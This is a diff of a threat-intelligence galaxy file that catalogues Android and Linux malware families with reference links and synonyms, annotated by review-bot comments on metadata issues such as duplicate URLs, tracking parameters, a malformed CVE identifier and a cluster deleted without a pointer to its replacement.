 "synonyms": [
 "Shaoye",
@@ -1361,9 +1619,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.oscorp",
- "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/"
+ "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/",
+ "https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution"
+ ],
+ "synonyms": [
+ "UBEL"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "8d383260-102f-46da-8cc6-7659cbbd9452",
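Review bot: The XLoader-specific refs added to MoqHao here are the refs of the separate XLoader cluster (uuid 2ba6a2d9-c1c7-482a-b888-b2871c5c5e25), which this same diff deletes outright in its last hunk, so the change looks like a merge of XLoader into MoqHao without a forward pointer. Any MISP event or sighting tagged with the old cluster uuid then dangles, and consumers searching for "XLoader" find nothing. If the two are being merged, I would add `"XLoader"` to MoqHao's `synonyms` (the array continues past this hunk) and keep the old uuid resolvable, either by leaving a stub marked `"revoked": true` or by adding a `related` link from MoqHao to the old uuid, rather than removing it silently.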
@@ -1401,6 +1662,21 @@
 "uuid": "a73375a5-3384-4515-8538-b598d225586d",
 "value": "PhantomLance"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat",
+ "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ",
+ "https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/",
+ "https://labs.k7computing.com/?p=22537"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6fa6c769-2546-4a5c-a3c7-24dda4ab597d",
+ "value": "PjobRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -1495,6 +1771,19 @@
 "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
 "value": "RedAlert2"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.remrat",
+ "https://blogs.360.cn/post/analysis-of-RemRAT.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "23809a2b-3c24-41c5-a310-2b8045539202",
+ "value": "RemRAT"
+ },
 {
 "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.",
 "meta": {
@@ -1531,6 +1820,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
+ "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
 "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
 "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
 ],
@@ -1662,6 +1952,20 @@
 "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
 "value": "SMSspy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova",
+ "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html",
+ "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2aa95661-b63a-432e-8e5e-74ac93b42d57",
+ "value": "S.O.V.A."
+ },
 {
 "description": "",
 "meta": {
@@ -1710,9 +2014,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
 "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
+ "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
 "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan",
- "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/"
+ "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan"
 ],
 "synonyms": [],
 "type": []
@@ -1863,14 +2169,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
- "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
+ "https://securelist.com/apkpure-android-app-store-infected/101845/",
 "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
+ "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
 "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/",
 "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
 "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
 "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html",
- "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/"
+ "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
 ],
 "synonyms": [],
 "type": []
@@ -1932,11 +2240,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005",
- "https://community.riskiq.com/article/6f60db72",
- "https://twitter.com/voodoodahl1/status/1267571622732578816",
- "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html",
 "https://s.tencent.com/research/report/951.html",
- "https://blog.talosintelligence.com/2020/10/donot-firestarter.html"
+ "https://twitter.com/voodoodahl1/status/1267571622732578816",
+ "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
+ "https://community.riskiq.com/article/6f60db72",
+ "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html",
+ "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/"
 ],
 "synonyms": [],
 "type": []
@@ -1944,6 +2253,21 @@
 "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b",
 "value": "Unidentified APK 005"
 },
+ {
+ "description": "Information stealer posing as a fake banking app, targeting Korean users.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006",
+ "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20",
+ "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/",
+ "https://twitter.com/ReBensk/status/1438027183490940931"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2263198d-af38-4e38-a7a8-4435d29d88e8",
+ "value": "Unidentified APK 006"
+ },
 {
 "description": "Related to the micropsia windows malware and also sometimes named micropsia.",
 "meta": {
@@ -1964,6 +2288,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat",
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
 "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
 "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/"
 ],
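Review bot: The `https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20` reference in the new Unidentified APK 006 entry carries the Twitter share-tracking suffix `?s=20`, which is not part of the resource identifier; the sibling `https://twitter.com/ReBensk/status/1438027183490940931` in the same list is stored without it. Storing the canonical form, `"https://twitter.com/MsftSecIntel/status/1441524497924833282",`, keeps exact-string de-duplication working when the same link is imported again. The same kind of suffix is present on the ESETresearch status in the Dark entry, on the IntezerLabs status in the Derusbi (ELF) entry, and as `?social_post=…&linkId=…` on the IBM link added to the kaiji and Kinsing entries.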
@@ -1978,6 +2303,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
+ "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack",
+ "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/",
 "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
 "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/"
 ],
@@ -2028,21 +2355,6 @@
 "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387",
 "value": "Xbot"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/",
- "https://securelist.com/roaming-mantis-part-v/96250/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25",
- "value": "XLoader"
- },
 {
 "description": "",
 "meta": {
@@ -2138,10 +2450,12 @@
 "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
 "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf",
 "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
 "https://www.youtube.com/watch?v=GjquFKa4afU",
 "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI",
 "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
 "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/",
 "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf"
 ],
@@ -2186,8 +2500,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://twitter.com/IntezerLabs/status/1326880812344676352"
+ "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/",
+ "https://twitter.com/IntezerLabs/status/1326880812344676352",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
 ],
 "synonyms": [],
 "type": []
@@ -2229,10 +2544,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns",
 "https://www.netscout.com/blog/asert/dropping-anchor",
- "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
 "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
 "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate"
 ],
 "synonyms": [],
 "type": []
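Review bot: The anchor_dns hunk adds both `https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/` and `https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/`, which by their identical slug appear to be the English and original-language versions of the same post. Keeping one of them (the `/en/` one, if that is the convention for this file) avoids a near-duplicate that consumers cannot collapse by string comparison. The enclosing AnchorDNS object starts before this hunk.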
@@ -2269,6 +2587,25 @@
 "uuid": "37374572-3346-4c00-abc9-9f6883c8866e",
 "value": "azazel"
 },
+ {
+ "description": "ESX and NAS modules for Babuk ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
+ "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "26b4d805-890b-4767-9d9f-a08adeee1c96",
+ "value": "Babuk (ELF)"
+ },
 {
 "description": "",
 "meta": {
@@ -2292,7 +2629,11 @@
 "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
 "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218",
 "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/"
+ "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
+ "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
+ "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf"
 ],
 "synonyms": [
 "Gafgyt",
@@ -2319,6 +2660,21 @@
 "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209",
 "value": "BCMPUPnP_Hunter"
 },
+ {
+ "description": "Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost",
+ "https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/"
+ ],
+ "synonyms": [
+ "elf.bifrose"
+ ],
+ "type": []
+ },
+ "uuid": "8fa6dd0e-b630-419f-bd01-5271dd8f27c6",
+ "value": "Bifrost"
+ },
 {
 "description": "A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.",
 "meta": {
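Review bot: The new Bifrost entry lists `elf.bifrose` as a synonym, which looks like a Malpedia family slug rather than an alias name; the other synonym lists in this file hold display names such as `Gafgyt` and `Dark.IoT`. If the intent is to record the alternative spelling, `"Bifrose"` would follow that convention, and if it is to record the former Malpedia identifier, a dedicated meta field would keep internal slugs out of synonym-based tag matching. The Malpedia details link already in `refs` makes the slug recoverable either way.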
@@ -2332,6 +2688,41 @@
 "uuid": "901ab128-2d23-41d7-a9e7-6a34e281804e",
 "value": "BigViktor"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bioset",
+ "https://twitter.com/IntezerLabs/status/1409844721992749059"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8e301f58-acef-48e7-ad8b-c27d3ed38eed",
+ "value": "BioSet"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://twitter.com/VK_Intel/status/1423188690126266370",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1277a4bf-466c-40bc-b000-f55cbd0994a7",
+ "value": "BlackMatter (ELF)"
+ },
 {
 "description": "",
 "meta": {
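Review bot: The BlackMatter (ELF) entry stores `https://blog.group-ib.com/blackmatter#` with a trailing empty fragment, and the same string is added again in the DarkSide (ELF) entry two hunks later. An empty `#` is not part of the resource and will stop the link from matching the bare URL on a later import; storing it as `"https://blog.group-ib.com/blackmatter",` in both places avoids a needless duplicate.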
@@ -2362,6 +2753,19 @@
 "uuid": "57c9ab70-7133-441a-af66-10c0e4eb898b",
 "value": "Break out the Box"
 },
+ {
+ "description": "XMRig-based mining malware written in Go.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.capoae",
+ "https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c1b0528b-c674-4c76-8e1d-5846ba8af261",
+ "value": "Capoae"
+ },
 {
 "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech",
 "meta": {
@@ -2470,6 +2874,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer",
+ "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/",
 "https://github.com/pooler/cpuminer"
 ],
 "synonyms": [],
@@ -2516,6 +2921,24 @@
 "uuid": "2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b",
 "value": "Dacls (ELF)"
 },
+ {
+ "description": "Mirai variant exploiting CVE-2021-20090 and CVE2021-35395 for spreading.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark",
+ "https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities",
+ "https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx",
+ "https://twitter.com/ESETresearch/status/1440052837820428298?s=20",
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx"
+ ],
+ "synonyms": [
+ "Dark.IoT"
+ ],
+ "type": []
+ },
+ "uuid": "d499e7ad-332f-4057-b31d-a69916408057",
+ "value": "Dark"
+ },
 {
 "description": "",
 "meta": {
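Review bot: The description of the new Dark entry reads `CVE2021-35395`, which is missing the hyphen after `CVE` and will not be found by anyone searching or regex-matching on the canonical identifier form. Change it to `"description": "Mirai variant exploiting CVE-2021-20090 and CVE-2021-35395 for spreading.",` so both identifiers in the sentence use the same format.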
@@ -2529,6 +2952,89 @@
 "uuid": "dfba0c8f-9d06-448b-817e-6fffa1b22cb9",
 "value": "Dark Nexus"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9",
+ "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://pylos.co/2021/05/13/mind-the-air-gap/",
+ "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
+ "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
+ "https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version",
+ "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "61796628-c37b-4284-9aa4-9f054cc6c3c2",
+ "value": "DarkSide (ELF)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark_radiation",
+ "https://www.sentinelone.com/blog/darkradiation-abusing-bash-for-linux-and-docker-container-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "39be337b-8a9a-4d71-949b-5efd6248fc80",
+ "value": "DarkRadiation"
+ },
+ {
+ "description": "First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting crypto currency mining (Monero).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg",
+ "https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/",
+ "https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/",
+ "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/",
+ "https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/",
+ "https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5c42585b-ea92-4fe2-8a79-bb47a3df67ad",
+ "value": "DDG"
+ },
 {
 "description": "",
 "meta": {
@@ -2542,6 +3048,19 @@
 "uuid": "07f48866-647c-46b0-a0d4-29c81ad488a8",
 "value": "ddoor"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi",
+ "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "494dcdfb-88cb-456d-a95a-252ff10c0ba9",
+ "value": "Derusbi (ELF)"
+ },
 {
 "description": "",
 "meta": {
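Review bot: The DarkSide (ELF) `refs` list contains `https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/` twice, once bare and once with the `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout` tracking query appended. The second form points to the same article and should be dropped, leaving only the bare URL; more generally, stripping tracking parameters before a reference is stored keeps exact-string de-duplication reliable. This hunk also begins earlier, at the Dark Nexus context lines, and the duplicate sits near the end of the 42-entry list.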
@@ -2578,6 +3097,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
 "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
 "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml",
+ "https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download",
 "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/",
 "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
 "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
@@ -2638,12 +3158,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel",
- "https://www.wired.com/story/sandworm-centreon-russia-hack/",
+ "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
 "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
 "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
 "https://twitter.com/craiu/status/1361581668092493824",
- "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+ "https://www.wired.com/story/sandworm-centreon-russia-hack/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -2664,6 +3185,19 @@
 "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60",
 "value": "ext4"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.facefish",
+ "https://blog.netlab.360.com/ssh_stealer_facefish_en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "106487ea-a710-4546-bd62-bdbfa0b0447e",
+ "value": "Facefish"
+ },
 {
 "description": "",
 "meta": {
@@ -2686,6 +3220,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher",
 "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
+ "https://securelist.com/finspy-unseen-findings/104322/",
